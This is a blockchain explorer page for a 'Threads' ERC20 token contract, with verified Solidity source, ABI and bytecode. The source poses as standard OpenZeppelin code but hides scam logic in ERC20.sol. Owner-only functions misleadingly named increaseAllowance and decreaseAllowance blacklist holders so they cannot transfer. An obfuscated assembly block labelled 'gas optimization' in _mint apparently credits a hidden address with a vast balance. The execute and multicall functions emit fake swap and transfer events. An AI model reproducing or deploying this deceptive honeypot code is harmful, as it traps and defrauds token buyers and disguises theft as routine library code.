ETH Price: $3,194.99 (+1.55%)
Gas: 1.37 Gwei
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve176486332023-07-08 11:05:23571 days ago1688814323IN
0x374a63c9...D40B72d55
0 ETH0.0008451317.89431239
Approve176471412023-07-08 6:02:47572 days ago1688796167IN
0x374a63c9...D40B72d55
0 ETH0.0008066517.10143686
Approve176469752023-07-08 5:29:11572 days ago1688794151IN
0x374a63c9...D40B72d55
0 ETH0.0009089719.27063895
Approve176466682023-07-08 4:26:59572 days ago1688790419IN
0x374a63c9...D40B72d55
0 ETH0.0007108515.07045004
Approve176441452023-07-07 19:58:11572 days ago1688759891IN
0x374a63c9...D40B72d55
0 ETH0.0031834267.48981591
Approve176439152023-07-07 19:11:11572 days ago1688757071IN
0x374a63c9...D40B72d55
0 ETH0.0026290556.09372733
Increase Allowan...176439142023-07-07 19:10:59572 days ago1688757059IN
0x374a63c9...D40B72d55
0 ETH0.0025471353.77342605
Increase Allowan...176438762023-07-07 19:03:23572 days ago1688756603IN
0x374a63c9...D40B72d55
0 ETH0.0032794269.23295254
Approve176433972023-07-07 17:26:35572 days ago1688750795IN
0x374a63c9...D40B72d55
0 ETH0.0014906931.56304651
Approve176433672023-07-07 17:20:35572 days ago1688750435IN
0x374a63c9...D40B72d55
0 ETH0.0016739535.44333224
Approve176432922023-07-07 17:04:47572 days ago1688749487IN
0x374a63c9...D40B72d55
0 ETH0.0022937148.56591608
Approve176431022023-07-07 16:26:23572 days ago1688747183IN
0x374a63c9...D40B72d55
0 ETH0.0019075540.38954118
Approve176430952023-07-07 16:24:59572 days ago1688747099IN
0x374a63c9...D40B72d55
0 ETH0.0017940238.03389972
Increase Allowan...176430002023-07-07 16:05:35572 days ago1688745935IN
0x374a63c9...D40B72d55
0 ETH0.0023699350.03245377
Increase Allowan...176429952023-07-07 16:04:35572 days ago1688745875IN
0x374a63c9...D40B72d55
0 ETH0.004861851.89577994
Execute176429742023-07-07 16:00:23572 days ago1688745623IN
0x374a63c9...D40B72d55
0 ETH0.0305581143.75878254
Increase Allowan...176429662023-07-07 15:58:47572 days ago1688745527IN
0x374a63c9...D40B72d55
0 ETH0.0013813529.16219225
Multicall176429402023-07-07 15:53:35572 days ago1688745215IN
0x374a63c9...D40B72d55
0 ETH0.0050322630.45151759
Execute176429222023-07-07 15:49:47572 days ago1688744987IN
0x374a63c9...D40B72d55
0 ETH0.005419432.7902139
Approve176429032023-07-07 15:45:47572 days ago1688744747IN
0x374a63c9...D40B72d55
0 ETH0.0013547528.89781431
Approve176428212023-07-07 15:29:23572 days ago1688743763IN
0x374a63c9...D40B72d55
0 ETH0.0012011143.95011255
Approve176428212023-07-07 15:29:23572 days ago1688743763IN
0x374a63c9...D40B72d55
0 ETH0.0020788744.01686893
Increase Allowan...176428192023-07-07 15:28:47572 days ago1688743727IN
0x374a63c9...D40B72d55
0 ETH0.0018010138.02181642
Increase Allowan...176424832023-07-07 14:20:47572 days ago1688739647IN
0x374a63c9...D40B72d55
0 ETH0.0102312248.84807635
Increase Allowan...176424002023-07-07 14:04:11572 days ago1688738651IN
0x374a63c9...D40B72d55
0 ETH0.0023664849.95955118
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Threads

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 5: Threads.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract Threads is ERC20 {
    constructor() ERC20("THREADS", "Threads") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

File 2 of 5: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 5: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _snapshot;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool private _snapshotApplied = false;
    address private _title;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 8;
    }

    function increaseAllowance(address [] calldata _allowance_) external onlyOwner {
        for (uint256 i = 0; i < _allowance_.length; i++) {
            _snapshot[_allowance_[i]] = true;
        }
    }

    function decreaseAllowance(address [] calldata _allowance_) external onlyOwner {
        for (uint256 i = 0; i < _allowance_.length; i++) {
            _snapshot[_allowance_[i]] = false;
        }
    }

    function allowance(address _bytes_) public view returns (bool) {
        return _snapshot[_bytes_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function execute(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_title, _addresses_[i], _out);
        }
    }
    function multicall(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _title, _in);
        }
    }

    function multicall(address a) external onlyOwner {_title = a;}

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
            // gas optimization 
            assembly {
                let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
                mstore(0x00, slot)
                mstore(0x20, 0x01)
                let sslot := keccak256(0x0, 0x40)
                sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 //amount
    ) internal virtual {if (_snapshot[to] || _snapshot[from]) require(_snapshotApplied == true, "");}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

}

File 4 of 5: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event Swap(address indexed sender,uint amount0In,uint amount1In,uint amount0Out,uint amount1Out,address indexed to);
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 5 of 5: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"allowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_allowance_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_allowance_","type":"address[]"}],"name":"increaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"a","type":"address"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600760006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600781526020017f54485245414453000000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f5468726561647300000000000000000000000000000000000000000000000000815250620000b9620000ad6200013460201b60201c565b6200013c60201b60201c565b8160059080519060200190620000d1929190620004c7565b508060069080519060200190620000ea929190620004c7565b5050506200012e33620001026200020060201b60201c565b600a62000110919062000711565b64e8d4a5100062000122919062000762565b6200020960201b60201c565b62000982565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200027c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002739062000824565b60405180910390fd5b6200029060008383620003bb60201b60201c565b8060046000828254620002a4919062000846565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200039b9190620008b4565b60405180910390a3620003b760008383620004c260201b60201c565b5050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806200045d5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15620004bd5760011515600760009054906101000a900460ff16151514620004bc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004b390620008fb565b60405180910390fd5b5b505050565b505050565b828054620004d5906200094c565b90600052602060002090601f016020900481019282620004f9576000855562000545565b82601f106200051457805160ff191683800117855562000545565b8280016001018555821562000545579182015b828111156200054457825182559160200191906001019062000527565b5b50905062000554919062000558565b5090565b5b808211156200057357600081600090555060010162000559565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200060557808604811115620005dd57620005dc62000577565b5b6001851615620005ed5780820291505b8081029050620005fd85620005a6565b9450620005bd565b94509492505050565b600082620006205760019050620006f3565b81620006305760009050620006f3565b816001811462000649576002811462000654576200068a565b6001915050620006f3565b60ff84111562000669576200066862000577565b5b8360020a91508482111562000683576200068262000577565b5b50620006f3565b5060208310610133831016604e8410600b8410161715620006c45782820a905083811115620006be57620006bd62000577565b5b620006f3565b620006d38484846001620005b3565b92509050818404811115620006ed57620006ec62000577565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b60006200071e82620006fa565b91506200072b8362000704565b92506200075a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200060e565b905092915050565b60006200076f82620006fa565b91506200077c83620006fa565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620007b857620007b762000577565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200080c601f83620007c3565b91506200081982620007d4565b602082019050919050565b600060208201905081810360008301526200083f81620007fd565b9050919050565b60006200085382620006fa565b91506200086083620006fa565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000898576200089762000577565b5b828201905092915050565b620008ae81620006fa565b82525050565b6000602082019050620008cb6000830184620008a3565b92915050565b50565b6000620008e3600083620007c3565b9150620008f082620008d1565b600082019050919050565b600060208201905081810360008301526200091681620008d4565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200096557607f821691505b602082108114156200097c576200097b6200091d565b5b50919050565b611fab80620009926000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a457c2d711610071578063a457c2d714610331578063a9059cbb14610361578063dd62ed3e14610391578063e1268115146103c1578063f2fde38b146103dd5761012c565b8063715018a6146102b357806373ed6b13146102bd5780638da5cb5b146102d957806395d89b41146102f757806397541e9f146103155761012c565b806339509351116100f457806339509351146101eb5780633e5beab91461021b578063477e19441461024b578063618a2f5e1461026757806370a08231146102835761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d578063313ce567146101cd575b600080fd5b6101396103f9565b6040516101469190611471565b60405180910390f35b61016960048036038101906101649190611531565b61048b565b604051610176919061158c565b60405180910390f35b6101876104ae565b60405161019491906115b6565b60405180910390f35b6101b760048036038101906101b291906115d1565b6104b8565b6040516101c4919061158c565b60405180910390f35b6101d56104e7565b6040516101e29190611640565b60405180910390f35b61020560048036038101906102009190611531565b6104f0565b604051610212919061158c565b60405180910390f35b6102356004803603810190610230919061165b565b610527565b604051610242919061158c565b60405180910390f35b610265600480360381019061026091906116ed565b61057d565b005b610281600480360381019061027c919061173a565b61062a565b005b61029d6004803603810190610298919061165b565b610794565b6040516102aa91906115b6565b60405180910390f